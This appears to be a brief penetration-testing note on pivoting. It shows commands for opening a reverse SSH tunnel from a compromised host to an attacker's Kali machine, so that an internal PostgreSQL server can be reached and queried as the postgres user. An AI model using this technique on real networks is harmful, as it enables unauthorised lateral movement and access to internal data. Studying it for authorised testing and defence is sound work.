// goal: access postgresql in 10.0.10.3
//start ssh in kali machine
kali@kali:~$ sudo service ssh start
//start ssh in compromised shell
user@hackedsystem:~$ ssh -N -R 127.0.0.1:1234:10.0.10.3:5432 kali@<kali_machine_ip>
//check for remote port forward port is listening
kali@kali:~$ ss -ntplu
Netid State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
tcp LISTEN 0 128 127.0.0.1:1234 0.0.0.0:*
//try to remote connect postgresql
kali@kali:~$ psql -h 127.0.0.1 -p 1234 -U postgres